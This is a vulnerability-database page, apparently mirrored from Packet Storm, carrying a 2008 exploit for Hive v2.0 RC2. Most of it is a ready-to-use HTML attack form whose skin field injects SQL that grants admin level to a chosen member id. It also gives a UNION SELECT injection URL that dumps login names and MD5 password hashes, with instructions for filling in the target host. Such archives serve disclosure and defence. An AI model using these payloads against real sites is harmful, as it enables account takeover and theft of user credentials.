Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

digitalhive-sql.txt

🗓️ 11 Jan 2008 00:00:00Reported by j0j0Type 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 20 Views

Hive v2.0 RC2 Remote SQL Injection by j0j0. Create account, login, and use exploit with modified action URL. Inject SQL to gain admin access. Another injection through URL parameters. Change {HOST}, {PATH}, {SQL_PREFIX}, and {MEMBER_ID} then read LOGIN:MD5_PASSWORD from "Pseudonyme" field

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`<!--  
Hive v2.0 RC2 Remote SQL Injection  
c0ded by j0j0  
-->  
<html>  
<head>  
<style type="text/css">  
body {  
margin:3%;  
font-size:10px;  
color:#FFFFFF;  
font-family:Verdana,Arial;  
background-color:#1a1a1a;  
text-align: center;  
}  
input {  
background:#303030;  
color:#FFFFFF;  
font-family:Verdana,Arial;  
font-size:10px;  
vertical-align:middle;  
border-left:1px solid #5d5d5d;  
border-right:1px solid #121212;  
border-bottom:1px solid #121212;  
border-top:1px solid #5d5d5d;  
padding: 3px;  
margin: 2px;  
}  
input[type=text] {  
width: 200px;  
}  
textarea {  
background:#303030;  
color:#FFFFFF;  
font-family:Verdana,Arial;  
font-size:10px;  
vertical-align:middle;  
border-left:1px solid #121212;  
border-right:1px solid #5d5d5d;  
border-bottom:1px solid #5d5d5d;  
border-top:1px solid #121212;  
}  
table td {  
font-size: 10px;  
font-family: Verdana, Arial;  
}  
h3 { color: #CC0000; }  
a {  
color: #999999;  
text-decoration: none;  
font-weight: bold;  
}  
#exploit {  
font-family: Courier New, sans-ms;  
font-size: 12px;  
color: #00FF00;  
width: 400px;  
text-align: left;  
}  
</style>  
</head>  
<body>  
<center>  
<h3>Hive v2.0 RC2 Remote SQL Injection<br /><br />-= c0ded by j0j0 =-</h3>  
<br />  
<p>you must first create an account, and log in.<br />  
then you can send exploit<br />  
<span style="color:#cc0000;">don't forget to change the action="" URL of this form</span></p>  
<p>&nbsp;</p>  
  
<table width="600px" cellspacing="1">  
<tr>  
<td width="20%" class="td5_2">Username</td>  
<td class="td5_1"><input type="text" name="id" value="admin" /></td>  
<td>you will use this username to login</td>  
</tr>  
<tr>  
<td class="td5_2">Password</td>  
<td class="td5_1"><input type="text" name="password" value="admin" /></td>  
<td>you will use this password to login</td>  
</tr>  
<tr>  
<td class="td5_2">Mail</td>  
<td class="td5_1"><input type="text" class="texte" name="mail" size="24" value="[email protected]" /></td>  
<td>email doesn't have importance</td>  
</tr>  
<tr>  
<td class="td5_2">SQL Injection</td>  
<td colspan="3" class="td5_1">  
<input name="selectskin" type="text" value="purpletech', niveau_num=4 WHERE num=2 /*"/>  
</td>  
</tr>  
</table>  
<p>purpletech', niveau_num=4 WHERE num=2 /* <-- niveau_num is for admin access / num is the member id (default admin id is 2)<br /></p>  
<br>  
<input type="submit" name="submitButtonName" value="Attack">  
<p>&nbsp;</p>  
<p>Now you are admin, logout and re-login with new username/password</p>  
<p>There is another one injection :  
<div style="max-width:500px;">  
http://{HOST}/{PATH}/base.php?page=gestion_membre.php&var=profil&user_id=-9999999'/**/UNION/**/SELECT/**/  
  
0,concat(nick,char(58),pass),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/FROM/**/_user/**/WHERE<br />/**/{SQL_PREFIX}_user.num={MEMBER_ID}/**//*<br />  
</div>  
<br /><br />  
Change {HOST}, {PATH}, {SQL_PREFIX} and {MEMBER_ID}<br />  
then look at the "Pseudonyme" field, you've got LOGIN:MD5_PASSWORD)</p>  
<!--  
Hidden inputs  
-->  
<input type="hidden" class="texte" name="nom" size="24" value="h4ck3d" >  
<input type="hidden" class="texte" name="prenom" size="24" value="h4ck3d" >  
<input type="hidden" class="texte" name="age" size="24" value="h4ck3d" >  
<input type="hidden" class="texte" name="icq" size="24" value="h4ck3d" >  
<input type="hidden" class="texte" name="adresse" size="24" value="h4ck3d" >  
<input type="hidden" class="texte" name="msn" size="24" value="h4ck3d" >  
<input type="hidden" class="texte" name="aim" size="24" value="h4ck3d" >  
<input type="hidden" class="texte" name="hobbie" size="24" value="h4ck3d" >  
<input type="hidden" class="texte" name="yahoo" size="24" value="h4ck3d" >  
<input type="hidden" class="texte" name="site" size="24" value="h4ck3d" >  
<input type="hidden" class="texte" name="text" size="24" value="h4ck3d" >  
<input type="hidden" class="texte" name="selectlangue" size="24" value="h4ck3d" >  
<input type="hidden" value="false" name="online" >  
</form>  
</center>  
</body>  
</html>  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
11 Jan 2008 00:00Current
7.4High risk
Vulners AI Score7.4
hive v2.0 rc2remote sql injectionj0j0account securityurl modificationsql injectionadmin accessurl parameters
20
.json
Report